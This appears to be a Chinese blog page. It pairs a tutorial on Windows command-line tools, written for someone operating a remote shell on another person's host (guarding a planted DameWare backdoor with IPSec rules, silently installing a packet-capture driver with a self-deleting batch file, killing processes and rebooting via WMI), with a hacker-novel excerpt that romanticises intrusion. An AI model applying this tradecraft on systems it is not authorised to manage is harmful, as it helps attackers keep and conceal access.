1.*关于命令行下读取组策略的问题。系统默认的安全数据库位于%windir%\security\database\secedit.sdb,将它导出至inf文件:secedit /export /cfg gp.inf /log 1.log没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。不过,这样得到的只是组策略的一部分(即&Windows设置&)。而且,某个策略如果未配置,是不会被导出的。比如&重命名系统管理员帐户&,只有被定义了才会在inf文件中出现NewAdministratorName=&xxx&。对于无法导出的其他的组策略只有通过访问注册表来获得了。此办法在XP和2003下无效&&可以导出但内容基本是空的。原因不明。根据官方的资料,XP和2003显示组策略用RSoP(组策略结果集)。相应的命令行工具是gpresult。但是,它获得的是在系统启动时被附加(来自域)的组策略,单机测试结果还是&空&。所以,如果想知道某些组策略是否被设置,只有先写一个inf,再用secedit /analyze,然后查看日志了。网络配置Windows自带的关于网络的命令行工具很多,比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat,还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh&&这些命令又可分成三类:网络检测(如ping)、网络连接(如telnet)和网络配置(如netsh)。前面两种相对简单,本文只介绍两个网络配置工具。netsh在远程shell中使用netsh首先要解决一个交互方式的问题。前面说过,很多shell不能再次重定向输出输出,所以不能在这种环境下交互地使用ftp等命令行工具。解决的办法是,一般交互式的工具都允许使用脚本(或者叫应答文件)。比如ftp -s:filename。netsh也是这样:netsh -f filename。netsh命令的功能非常多,可以配置IAS、DHCP、RAS、WINS、NAT服务器,TCP/IP协议,IPX协议,路由等。我们不是管理员,一般没必要了解这么多,只需用netsh来了解目标主机的网络配置信息。1,TCP/IP配置echo interface ip &secho show config &&snetsh -f sdel s由此你可以了解该主机有多个网卡和IP,是否是动态分配IP(DHCP),内网IP是多少(如果有的话)。这个命令和ipconfig /all差不多。注意,以下命令需要目标主机启动remoteaccess服务。如果它被禁用,请先通过导入注册表解禁,然后net start remoteaccess2,ARPecho interface ip &secho show ipnet &&snetsh -f sdel s这个比arp -a命令多一点信息。3,TCP/UDP连接echo interface ip &secho show tcpconn &&secho show udpconn &&snetsh -f sdel s这组命令和netstat -an一样。4,网卡信息如果netsh命令都有其他命令可代替,那它还有什么存在的必要呢?下面这个就找不到代替的了。echo interface ip &secho show interface &&snetsh -f sdel snetsh的其他功能,比如修改IP,一般没有必要使用(万一改了IP后连不上,就&叫天不应叫地不灵&了),所以全部略过。IPSec首先需要指出的是,IPSec和TCP/IP筛选是不同的东西,大家不要混淆了。TCP/IP筛选的功能十分有限,远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。XP系统用ipseccmd,2000下用ipsecpol。遗憾的是,它们都不是系统自带的。ipseccmd在xp系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中,ipsecpol在2000 Resource Kit里。而且,要使用ipsecpol还必须带上另外两个文件:ipsecutil.dll和text2pol.dll。三个文件一共119KB。IPSec可以通过组策略来控制,但我找遍MSDN,也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以,组策略这条路走不通。IPSec的设置保存在注册表中(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local),理论上可以通过修改注册表来配置IPSec。但很多信息以二进制形式存放,读取和修改都很困难。相比之下,上传命令行工具更方便。关于ipsecpol和ipseccmd的资料,网上可以找到很多,因此本文就不细说了,只是列举一些实用的例子。在设置IPSec策略方面,ipseccmd命令的语法和ipsecpol几乎完全一样,所以只以ipsecpol为例:1,防御rpc-dcom攻击ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。具体含义如下:-p myfirewall 指定策略名为myfirewall-r rpc-dcom 指定规则名为rpc-dcom-f && 建立7个筛选器。*表示任何地址(源);0表示本机地址(目标);+表示镜像(双向)筛选。详细语法见ipsecpol -?-n BLOCK 指定筛选操作是&阻塞&。注意,BLOCK必须是大写。-w reg 将配置写入注册表,重启后仍有效。-x 立刻激活该策略。2,防止被pingipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x如果名为myfirewall的策略已存在,则antiping规则将添加至其中。注意,该规则同时也阻止了该主机ping别人。3,对后门进行IP限制假设你在某主机上安装了DameWare Mini Remote Control。为了保护它不被别人暴破密码或溢出,应该限制对其服务端口6129的访问。ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w regipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x这样就只有123.45.67.89可以访问该主机的6129端口了。如果你是动态IP,应该根据IP分配的范围设置规则。比如:ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w regipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。在写规则的时候,应该特别小心,不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样,可以先用计划任务&留下后路&。例如:c:\&net start scheduleTask Scheduler 服务正在启动 ..Task Scheduler 服务已经启动成功。c:\&time /t12:34c:\&at 12:39 ipsecpol -p myfw -y -w reg新加了一项作业,其作业 ID = 1然后,你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。如果测试结果不理想,就删除该策略。c:\&ipsecpol -p myfw -o -w reg注意,删除策略前必须先确保它已停止。不停止它的话,即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间,默认是180分钟。如果测试通过,那么就启用它。c:\&ipsecpol -p myfw -x -w reg最后说一下查看IPSec策略的办法。对于XP很简单,一条命令搞定&&ipseccmd show filters而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中。(已经上传了三个文件,也就不在乎多一个了。^_^)netdiag需要RemoteRegistry服务的支持。所以先启动该服务:net start remoteregistry不启动RemoteRegistry就会得到一个错误:[FATAL] Failed to get system information of this machine.netdiag这个工具功能十分强大,与网络有关的信息都可以获取!不过,输出的信息有时过于详细,超过命令行控制台cmd.exe的输出缓存,而不是每个远程cmd shell都可以用more命令来分页的。查看ipsec策略的命令是:netdiag /debug /test:ipsec然后是一长串输出信息。IPSec策略位于最后。软件安装一个软件/工具的安装过程,一般来说只是做两件事:拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容,那么就可以自己在命令行下实现了。(不考虑安装后需要注册激活等情况)WinPcap是个很常用的工具,但必须在窗口界面下安装。在网上也可以找到不用GUI的版本(但还是有版权页),其实我们完全可以自己做一个。以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照,很容易了解整个安装过程。除去反安装的部分,关键的文件有三个:wpcap.dll,packet.dll和npf.sys。前面两个文件位于system32目录下,第三个在system32\drivers下。而注册表的变化是增加了一个系统服务NPF。注意,是系统服务(即驱动)不是Win32服务。作为系统服务,不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下也增加主键。而后者默认只有SYSTEM身份才可以修改。幸运的是,并不需要手动添加它,winpcap被调用时会自动搞定。甚至完全不用手动修改注册表,所有的事winpcap都会自己完成,只需要将三个文件复制到合适的位置就行了。作为范例,还是演示一下如何修改注册表:利用前面说过的inf文件来实现。[Version]Signature=&$WINDOWS NT$&[DefaultInstall.Services]AddService=NPF,,winpcap_svr[winpcap_svr]DisplayName=Netgroup Packet FilterServiceType=0×1StartType=3ErrorControl=1ServiceBinary=%12%\npf.sys将上面这些内容保存为_wpcap_.inf文件。再写一个批处理_wpcap_.bat:rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.infdel _wpcap_.infif /i %CD%==%SYSTEMROOT%\system32 goto COPYDRVcopy packet.dll %SYSTEMROOT%\system32\copy wpcap.dll %SYSTEMROOT%\system32\del packet.dlldel wpcap.dll:COPYDRVif /i %CD%==%SYSTEMROOT%\system32\drivers goto ENDcopy npf.sys %SYSTEMROOT%\system32\drivers\del npf.sys:ENDdel %0然后用winrar将所有文件(5个)打包为自解压的exe,并将『高级自解压选项』-&『解压后运行』设置为_wpcap_.bat,命令行的winpcap安装包就制作完成了。注意,批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。所有的软件安装,基本上可以套用这个思路。但也有例外的,那就是系统补丁的安装。由于系统补丁有可能要替换正在被执行或访问的文件,所以用copy命令是不行的。幸好,Windows补丁包支持命令行安装。比如:KB824146.exe -n -z -q-n 不保留备份-z 不重起-q 安静模式如果有一堆补丁要打,那么用RAR打包成自解压文件,外加一个批处理。for %%f in (KB??????.exe) do %%f -n -z -qfor %%f in (KB??????.exe) do del %%fdel %0Windows脚本很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。1,显示系统版本@echo for each ps in getobject _ &ps.vbs@echo (&winmgmts:\\.\root\cimv2:win32_operatingsystem&).instances_ &&ps.vbs@echo wscript.echo ps.caption^&& &^&ps.version:next &&ps.vbscscript //nologo ps.vbs & del ps.vbs2,列举进程@echo for each ps in getobject _ &ps.vbs@echo (&winmgmts:\\.\root\cimv2:win32_process&).instances_ &&ps.vbs@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next &&ps.vbscscript //nologo ps.vbs & del ps.vbs3,终止进程@echo for each ps in getobject _ &pk.vbs@echo (&winmgmts:\\.\root\cimv2:win32_process&).instances_ &&pk.vbs@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next &&pk.vbs要终止PID为123的进程,使用如下语法:cscript pk.vbs 123如果显示一个0,表示终止成功。然后:del pk.vbs4,重启系统@echo for each os in getobject _ &rb.vbs@echo (&winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem&).instances_ &&rb.vbs@echo os.win32shutdown(2):next &&rb.vbs & cscript //nologo rb.vbs & del rb.vbs5,列举自启动的服务@echo for each sc in getobject(&winmgmts:\\.\root\cimv2:win32_service&).instances_ &sc.vbs@echo if sc.startmode=&Auto& then wscript.echo sc.name^&& – &^&sc.pathname &&sc.vbs@echo next &&sc.vbs & cscript //nologo sc.vbs & del sc.vbs6,列举正在运行的服务@echo for each sc in getobject(&winmgmts:\\.\root\cimv2:win32_service&).instances_ &sc.vbs@echo if sc.state=&Running& then wscript.echo sc.name^&& – &^&sc.pathname &&sc.vbs@echo next &&sc.vbs & cscript //nologo sc.vbs & del sc.vbs7,显示系统最后一次启动的时间@echo for each os in getobject _ &bt.vbs@echo (&winmgmts:\\.\root\cimv2:win32_operatingsystem&).instances_ &&bt.vbs@echo wscript.echo os.lastbootuptime:next &&bt.vbs & cscript //nologo bt.vbs & del bt.vbs显示结果的格式是:yyyymmddHHMMSSxxxxxxZZZZ_年_月日时分秒_微秒_时区8,显示系统运行时间@echo for each os in getobject _ &rt.vbs@echo (&winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system&).instances_ &&rt.vbs@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 &&rt.vbs@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next &&rt.vbs@echo wscript.echo cint(r)^&&d &^&t\3600^&&h &^&t\60 mod 60^&&m &^&t mod 60^&&s&:next &&rt.vbscscript //nologo rt.vbs & del rt.vbs这个运行时间是从性能计数器中获得的64位整型数,不会出现在49.7天后溢出的情况。
— 黑眼睛 @ 10:42 pm
&在未来的时代里,只有黑客能改变这个世界的所有秩序,无论是经济秩序,还是军事秩序。&   &&德国《快捷报》
  我在这个圈子里小有名气,人们称我为天王。   这本来是一个独一无二的称呼,但后来这个圈子的影响越来越大,人也越来越多,一些高手也被称为天王,不过他们的天王后面总要带名字,比如说,天王肥猫。他是我唯一看得起的少数几个圈内人之一。但圈内人只称他为天王肥猫,或者肥猫,从没有简称为天王,因为圈内人都知道,也都公认为,真正的天王只有一个,那就是我。
  在这个圈子中,我是个傲慢的侠客。从小我看着金庸古龙的书长大,在我小时候的梦里,除了面目不清的女人身体外,就是古树栈道,落英缤纷,铁马金戈。而我,仗剑走天涯,笑傲江湖。我时常想象我在寂静的荒山,忽明忽暗的磷光,仰望无穷星空,梦想自己是万能的圣者。
  我当然没办法成为武功盖世的高手,我拼命地锻炼身体,但除了在体育课上拿90分外,还是没能飞檐走壁。于是我把我的梦想寄托在网络。   忘记说了,这个圈子里的人,被称为网络入侵者,简称黑客。英文是HACKER或者CRACKER.当然,真正的黑客只说自己是HACKER,他们看不起那些到处破坏攻击的C RACKER.这是个奇妙的世界,在这个世界里,你可以随心所欲,从另一个角度来说,人能成为万能的主宰。你想象不到0和1组成的世界是如此奇妙。我也想象不到,所以,当5 年前我第一次接触网络时,我就知道我失去了自己&&我将从此迷失在现实和虚幻之间,寻找梦想中的国度。
  每一个沉迷网络的人都是在寻找自己的精神家园,他们的愿望,他们的忧伤,他们的欢乐,只有在网络中才能找到,也只有在网络中才有充实。他们把网络看成自己的伴侣,他们想象冷冰冰的机器后面是如火的热情,可以把人完全吞噬的热情。
  我也曾经如此投入过。当有一天我从昏睡中醒来,看见女友含着泪水的眼睛,一步步退后,打开门,然后轻轻的关上。在门即将闭上的一刹那,我分明看见了一颗晶莹的泪珠,滑过空气,滑过网络与现实的夹缝,清脆的落在房门口尘积的地板上。
  然后门关上了,我再也看不到现实,再也听不到车来车往人来人去,再也闻不到女人悠悠甜甜的体香。我努力的从床上坐起,越过闪烁的屏幕和嗡嗡的蜂鸣,走到卫生间的镜子前,我看见了一个面目狰狞眼眶浮肿头发凌乱的怪物,奇怪的是,我似乎看到了怪物的头上闪烁着绚丽的光环。
  那天晚上,第一次有人称我为天王。
  我不知道肥猫是个什么样的人,他似乎比我还神秘。我第一次遇到他是在一所大学的系统里,我花了几分钟进入了主机,找到了几个后门,很轻易的获得了管理员的权限。那时我还只是大三的学生,我只是把网络作为消遣的手段,我从来不认为网络能让我得到性爱的高潮。我在系统里闲逛,体验着偷偷摸摸的快感,就象第一次在女朋友的家里,手忙脚乱地脱下她的衣服一样。我没有对系统做任何修改,我严格地遵守黑客第一准则:不对入侵的系统做任何破坏,除非万不得已。我顺手看了几封信,没有发现刺激的东西,正想走时,我发现了一个志同道合的人。很明显,这是一个刚入门的菜鸟。他可能是这个系统的一个普通用户,这让他有很多便利去验证刚学到的知识。他在密码文件里翻看,试图找到没有被s hadow的密码。我注视着他的动作,考虑要不要和他打招呼。毕竟,能找到一个可以讨论问题的人不容易。而现实中,我遵守着黑客第二准则:不对任何人谈论自己是黑客,和所破解的系统。
  我显然是小看了他,他很快注意到有人在记录他的动作,于是立刻掉线走了。我查了一下他的IP,发现被隐藏了。我笑了笑,点燃一根烟。   第二次,我知道了他叫肥猫,其他我没有问。黑客的准则三:不要询问其他黑客私人问题。肥猫也只知道我叫不长叶子的树。这个名字只被叫了一年,在我大学毕业后的某一天,在谈了三年的女朋友离开的那个晚上,我被称为天王。
  我知道肥猫不服气,虽然他基本上是向我学的,但他的水平,说实在话,不在我之下。也许是我的孤独,让我有一种凌驾众人之上的超越感。圈子里的人都知道,我并不经常上网,但只要一上,无论多严密的系统我都能长驱直入。我知道肥猫也可以,但也许是他太频繁的侵入,使得他失去了尊重。
  我的被人尊重源于我对网络的超越,而我对网络的超越源于那一颗晶莹的眼泪。在网络与爱情失去平衡时,我选择了两者都逃避。   我知道,逃避不是永远的,但我没想到这么快,我就被卷入了一场战争。是的,战争,属于黑客的战争。
  我走进办公室,一切都和往常一样,同事们坐在属于自己的小隔间里,面对着计算机紧张的忙碌。大学毕业后我就来到了深圳这家大型的I T企业工作,我之所以选择一个大型的公司,是因为大公司可以轻松的打发时间。我没有想过发财创业,我的热情已经奉献给了其他的爱好。我也构想过将来,和女朋友吃饭睡觉上网是唯一的内容。现在这个内容发生了一点点变化。
  我坐在属于自己的小隔间。3平方米,只少不多。有时我很惊讶一个人怎么能一整天坐在这么一个狭小的空间。我通常是从早上8点到晚上9 点。计算一下就知道这个3平方米的空间消耗了人生命中的百分之六十。如果把睡觉的时间和床的空间加上,就可以得出一个令我吃惊的数据。人一生百分之九十五以上的时间局限在五平方米的空间。
  幸好人的思想是自由的。有一个无限的空间让我们去想象。   我打开机子,一阵熟悉的嗡嗡声。还有熟悉的WIN98欢迎界面。我不喜欢把开机画面改变,从多年前我从DOS3.3第一次转到WIN3.1,我就爱上了这个&窗口&。W IN2000早就出来了,但我没有装。里面的漏洞太多,从我的眼光看,简直是千疮百孔。当然,另一个原因是,我的机子是公司统一购买的戴尔机,操作系统是预装的。这和两年前微软大规模查处盗版有关。对于我所处的大型I T公司来说,是很好检查目标。原因很简单,公司有钱赔。
  WIN98消失,出来一个小小的绿色窗口。这是我自己编的一个小软件,用来记录我所在网络的异常情况。公司有自己的局域网,对员工的上网做了严格的限制,很多站点都不能去,尤其是免费邮箱。从保护商业机密的角度,无可厚非。虽然这对我来说不算任何障碍,但我并没有改变它。我不想在公司引人注意。公司也有不少网络高手。网络管理员小茜就是一个。我很欣赏她,作为一个非科班出身的女孩子来说,水平很不容易了。据说她去年刚毕业来公司的时候,被主任打发去做文员,完全是凭借自己的努力成为网管。
  虽然我没有改变局域网的设置,但我终究还是装了一个自己写的特洛衣木马,通过服务器的后门检测网络。我这么做没什么目的,只是本性使然。虽然公司研究开发的项目是国内领先的技术,有不少公司窥视,但我并认为真会有什么网络间谍。那只是小说电影里的情节罢了。
  我看了看绿色的窗口,立刻注意到一个不寻常的情况。报告显示,昨天服务器有人作为超级用户登陆了,而据我所知超级用户只有两个,就是主任和小茜。小茜昨天已经出差了,主任几乎从来不登陆服务器,他每天的会太多了。
  会是谁呢?我想查一下,但有点犹豫。这不是我的分内事。停了片刻,我还是想看一下。查阅的结果让我吸了一口冷气。   公司向国家申报的863课题的机密资料,也就是目前国内的第三代移动通讯的一种密码算法的资料,被人下载过,而要命的是,下载的地址是公司外部。我稍微一看就知道,可以不用去查I P了,这绝对是个天王级人物,也不知道中转过多少次才登陆,查也没用。
  我有点兴奋。这在圈内绝对是大事件,如此近在咫尺!   我当然没想到,这看起来只是公司的商业机密被窃取的事情,到最后由于政府与政府之间的摩擦,变的完全不受控制。
  我不知道该不该对主任说。很明显,我没有证据说服主任,就算能说服主任,恐怕我在这家公司也干不长久了。公司对商业机密的事情很敏感,每一个员工进公司的第一天,被灌输的就是保密。计算机的光驱和软驱都卸了。不准看的不看,不该问的不问,不该说的不说,不该传的不传。就算是一个部门,不同项目组间也严禁传阅资料。我并不是密码算法组的人,如果我说密码算法的资料被窃取了,那么今后我在领导的眼里恐怕就成了一块心病了。犹豫了很久,我决定先找小茜。
  打通小茜的手机时,她正在北京。我简单的说了一下。当然不会说自己监控网络,只是说自己作为普通用户登陆后觉得服务器里的文件好象有点凌乱。小茜没很在意,说明天回来后看一下。这种反应在我的意料中。我决定今晚监控一下。我知道与密码算法配套的还有一个说明文件,看起来并没有下载过。
  今晚等着你,我自言自语说。   晚上我很早就回到宿舍。我一个人住一室一厅,和所有单身汉的家一样,衣服裤子袜子满地都是。宽大的双人床一年多没有睡过两个人了。没有什么家具,除了桌子和电脑。还有乱七八糟的光碟,大部分是各种工具,当然还有黄片。这是每一个单身的电脑用户所必备的。没有什么游戏碟。很奇怪,我对游戏不感兴趣。我只喜欢在网络里游荡,从一个城市到另一个城市,一个人,没有影子。是的,网络中没有影子。留下影子的不能称为黑客。
  我拨号上网。公司的内部服务器只对内部局域网开放端口21和23,也就是TELENT和FTP功能。有专门的对外的服务器。内外服务器之间有专门的网关相连。我先输入公司的网址,进入外部服务器,然后通过T CP/IP的漏洞进入内部局域网。其实公司的防火墙做的非常出色,如果我不是公司员工,要突破估计也要几个小时。只是,怎么说呢,家贼难防。
  家贼难防?我忽然心里一动。对了,除了公司内部人员,有谁可以轻易地进入系统?又有谁知道公司有这么一份资料?我立刻想到了一个人。刘民。在我的印象中,计算机水平能达到黑客级的,也只有他了。更巧的是,他上个月辞职了,去了一家同行业的美资公司。那家公司和我所在的公司是竞争对手。
  我守侯着,这时ICQ的图标闪动起来。是肥猫。   忙啥呢?   瞎忙。   绿色兵团没跟你联系?   没有。   他们叫我帮忙,黑他美国佬一把。   为什么?   还不是飞机的事。   我记起来了,前几天美国的飞机在中国的领海上空,把一架中国飞机撞毁了,自己也降落在海南。现在网络上群情激昂。政府的态度也还算坚决。   我笑了笑。当然肥猫看不到,我从来不用微笑符。我就是我,网络孤独的侠者。   好好干,把老美修理一下。   没问题,不过这狗日的美国网站还真有点不好对付。我们正准备五一来一次大行动。红客联盟和飞鹰都参加。   我吃了一惊,如果这样的话,可真是黑客世界的大联手。   肥猫说了几句话就下线了。这么多年的交往了,他知道我喜欢独来独往。而我陷入了沉思。我知道我是想用网络逃避,一年了,我不知道自己是对是错,因为从来没有和人深入地交谈,我的宿舍好象已经很久没有人来过了。我似乎闻到了一个人的躯体腐烂发霉的味道。它回荡在房间,侵入到我的毛孔,透过机器的外壳渗透到我的心灵家园。
  也许,我该改变一点。   沉思中,机子突然发出尖锐的鸣叫。有人进入公司内部服务器了。   我的血液开始沸腾起来。每一个要上战场的将军,他的眼里只有敌人的鲜血。他渴望听到敌人垂死的呻吟,还有扭曲的痛苦。   我对屏幕残酷的笑了。他走不了。我已经在服务器上加了下载限制,文件的速度只能是几百字节,我会有很多的时间追踪敌人的藏身之处。   我用嗅探器开始搜索。看得出来,对手完全没有防备,在等待文件下载的过程中,他悠闲的在服务器中漫步,熟悉的打开一个又一个文件。我越发坚信,他是,或者曾经是一个内部人员。
  快成功了,还有十秒钟,我就能知道这个太岁头上动土的家伙躲在那里了。我轻松的靠着椅子,吹了一声口哨。   我没想到事情变化得这么快,那一瞬间我根本没有反应。作为一个天王,这是无比耻辱的事。我可笑的建立了多年的自信在几秒内完全崩溃。   因为,这个时候,我的屏幕蓝光一闪,音箱里发出一声长长的叹息,或者说,放了一个很舒服的屁,之后便完全沉静了。   我呆若木鸡。
  我走进办公室的时候整个脑袋都是无数个旋转的黑洞。昨天晚上彻夜未眠,为了把我的系统恢复过来。当然我可以重新格式化,重装系统。但一个真正的黑客永远不会这样做。这意味着什么?耻辱!就象一个鲜红的十字挂在胸前,虽然除了自己没人能看见。真正可悲的是,我不会象很多人那样给自己找逃脱的借口。所以我彻夜的分析检查。C MOS没有被摧毁,硬盘的数据基本上都在,看来攻击我的病毒并不是恶意的破坏,但无论如何我就是无法重启。我狠很咒骂着那个该死的同行,咬牙切齿的敲打着键盘。在凌晨六点多钟,终于在系统启动文件中发现了一个奇怪的不应该存在的文件路径。打开这个文件浏览后,我哭笑不得。
  一个恶作剧而已。这个程序的作用是让我的系统在24小时内不能启动。24小时后,该程序自动删除,系统就会恢复正常。   我咒骂着走进办公室,我昏昏沉沉的脑袋立刻感受到了不寻常的气氛。当一个人走进工作了三年的办公室,哪怕是地上多了一只蚂蚁你都会感觉到有所不同。当然这不是蚂蚁的问题。每一个同事的脸色都很不正常,可以说是面如死灰。大部分人对着计算机发呆。
  我知道我错了。我错怪了昨晚的黑客同行。因为整个公司的系统全部被攻击了。每一台计算机,只要和服务器一连接,立刻被感染恶作剧病毒。   很明显,不是昨晚的黑客所为。如果是他的话,他只会对我的机子攻击。而现在,没有目标全盘进攻,这种病毒只能是预先放置在服务器中,在某个特定的时刻发作。黑客没有办法在连接服务器的同时就启动程序,如果那样的话,他自己的系统也会被影响。
  一声巨响,门被撞开了,主任冲了进来。在我为公司工作的三年里,我从来没有见过他跑这么快,也没有见过他的脸色这么惨白。主任不过三十多,也是做技术出身,因此在他的领导下,我们其乐融融&&做技术出身的领导,一般是没有办法严格起来的,当然管理上就有点混乱。
  立刻就有同事上前请示怎么办。有人说要重装系统。我刚想出声反对,主任气喘嘘嘘,但是态度坚决的说,我已经通知了公司领导,而且叫小茜赶回来,她现在已经在飞机上,大家等等。
  就这一句话,我就发现平时看不起主任,实在是错怪他了。一个领导,永远不会匆忙下结论或做一件没有把握的事。我在考虑是不是告诉他怎样解决这个问题。昨天找到症结所在后,我已经顺利的恢复了系统。
  在等待小茜从北京赶回来的几个小时里,同事们聚集在一起热烈的讨论。平静如水的科技工作者的生活难得有点波澜。如果你是做开发的同行,你就会知道上班下班吃饭睡觉的枯燥了。除了办公室的人,你见不到任何新面孔,单身小伙子们闻不到任何女性的气息&&仅有的几个女孩子,也是不敢恭维,或者说,天天见面,已经可以不必把她们当女孩看待了。男士们过着快乐孤独的生活,女士们恨恨的咬牙&&兔子为什么不吃窝边草?
  我估计小茜就这么想的。按道理来说小茜属于不算漂亮也不算丑的一类,这类女孩构成了这个社会的主体。只不过技术上出色的女孩总是失去了被关注的女性一面,特别是泼辣的小茜。用泼辣这个词我觉得有点对不住,但想必也没什么人反对&&每一个同事都受过了她的训示:要帐号?找主任签字去找我干嘛!签完了我自然会给你分配你急啥急?要用光驱?又想拷什么黄色图片吧?装软件?服务器什么软件都有,想要什么我给你装!三级还是A 级?
  得,不算丑陋的小茜在其他几位更丑的女士顺利外卖后仍旧独来独往,北方的卷舌音响彻在办公室的上空,成为一道不算迷人的风景。   胡思乱想之际,主任走了进来,拍了拍手,做了一个大家安静的手势。   各位,主任脸色凝重的说,我刚才和市安全局网络安全科联系过了,这不是一个孤立的事件,昨天夜里,市里有好几家公司受到了攻击,还有政府的网站。据说,攻击来自美国。
  我知道是谁了。PoisonBOx,一个激进的美国黑客组织。自从中美飞机相撞事件以来,该组织不断在网上扬言要攻击中国网站。前几天已经有几家政府网站被入侵,被修改了主页,当时看了新闻也没往心里去,没想到居然发生在我身边了。但,我心中升起一丝疑虑,这和民间的科技公司有什么关联?
  我立刻想到了答案。公司的产品有一些卖到了被美国贸易制裁的国家,比如说,伊拉克的光纤骨干网。美国经常指责中国政府不顾国际禁令,支持一些大公司卖产品,其中就有我们公司的名字,当然政府和公司对外都是否认的。私下和同事交谈,都把美国骂的狗血临头,什么玩意,在那里指手画脚,1 2亿中国人民是被吓大的?
  其实我本人对美国并没有什么坏感,当然也没什么好感,我最讨厌的是日本。美国毕竟还标榜着自己的民主,而日本,不折不扣就是虚伪狡诈贪婪的民族。从学校出来后,我已经没有热血沸腾的激情了,对什么事情都是无所谓,不过在一年前攻击日本的行动中还是和肥猫合作过。我懒散的态度在女朋友离开之后达到了颠峰。用肥猫前几天对我说的一句话概括:我看你现在,就算有一个女人躺在你床上,恐怕你都懒得脱她的衣服了。我记得回了一句话:如果她主动脱的话我可以考虑。
  日子就象流水,永不停息,永不回头。
  小茜走进办公室的态度很从容,这令我对她刮目相看。谁说的来着?真正遇到危险时,女人永远比男人镇静。   小茜打开机子开始检查,我知道她几个小时之内是不会有什么结果的,她的水平我很清楚。   五分钟之后,小茜站起来,对守侯在一旁的主任说了两个字。虽然这两个字是平时听到最多上口率最高的词,但打死我也没想到这两个字可以如此轻易的说出来。   小茜说,搞定。   我再次目登口呆。   若干日子后,我问起小茜这个问题。当时我们全身赤裸汗水淋淋,在我那张双人床上战斗了很长一段时间。小茜在我怀里眨了半天眼睛,才从亢奋的边缘回过神来。你说这事啊,这有什么,我在飞机上想了很久了,安全局的人都告诉我是P oisonBOx干的,他们的风格你也知道啊。
  我无话可说。一个天大的误会。如果不是小茜说出那句话后在我心目中的形象急剧变高大,我就不会更加注意她,就不会发现她泼辣里温柔的女性一面,也就不会掉入陷阱了。当然,我对掉入这种陷阱没什么后悔的,甚至还有点满意。
  小茜说了搞定后主任的脸色变得红润起来。他亲切的拍了拍小茜的肩膀,这通常是领导的专利,也是表示友好的手势。基本上来说,被主任拍过肩膀的人,下个月有百分之八十的可能加一级工资。小茜可能也知道这一点,因为她的脸色也跟着红润起来。也许我更乐意把这理解为女孩的羞涩。
  一切恢复平静,同事们带着一点可以被称为遗憾的表情开始了工作。我理解这种表情,我也希望世界偶尔乱一下套,中规中矩的生活太久了。可惜这乱套的时间太短了,才半天。
  下班时,小茜走到我面前。有空吗?她不动声色的说。   我不知道她为什么找我,在我记忆中,小茜到公司的一年里我和她说过的话屈指可数。我从来不喜欢事业心这么强的女孩,何况以前的女朋友在学校被称为系花。   有空,什么事?   我们去老莫餐吧,我有点事和你说。   我带着一点好奇与奇异的感觉和她走在路上。我甚至在想,她不会是看上我了吧?不排除这种可能,在部门的光棍中我不算太差,重要的是,我看起来老实。有不少同事,泡吧喝酒出入娱乐场所是常事。在以事业为主要生活目标的深圳,没有时间去寻找另一半,对于科技人员来说更是如此。生理的需要只有靠非正常途径解决,大家心知肚明。
  在餐吧里,小茜根本没有给我自以为是的想象机会。   你昨天进入过服务器?   我吓了一跳,我立刻想起来了。我对自己屡犯低级错误后悔不已。昨天的突然事件让我根本没有机会消除我在服务器里的登陆记录!!而发生了这件事后,小茜自然会彻底清查服务器里的程序,我的后门监控软件不可避免的显形了。
  如此致命的错误居然出现在天王身上!!   我想我的脸色很难看,面对着小茜不动神色的脸,我实在不知道说什么好。大家都是圈中人,骗是骗不到的。虽然空调很冷,我的额头上却出现了汗滴。   我决定装傻,顶多承认装了个监控软件,一个部门的人,在服务器上装个程序也没什么。   也许看穿了我在想什么,小茜严肃地说,主任对这件事很重视,认为有内部人员泄密,要彻底清查。   我沉默。臭丫头想蒙我?我出道的时候你还在用小霸王呢。   万一,主任要动真的&&?我对主任不感冒,主任对我也不感冒。我们这些早来公司的员工从来就没把从另一个部门调来的主任放眼里,主任也对我们无可奈何。   正在沉思着,小茜忽然不可仰止的大笑起来。她捂着肚子,笑得花枝招展妩媚娇艳。花枝招展,妩媚娇艳,这两个形容词是我后来加上去的。当时我楞了好几分钟才反应过来。臭丫头原来是耍我的!
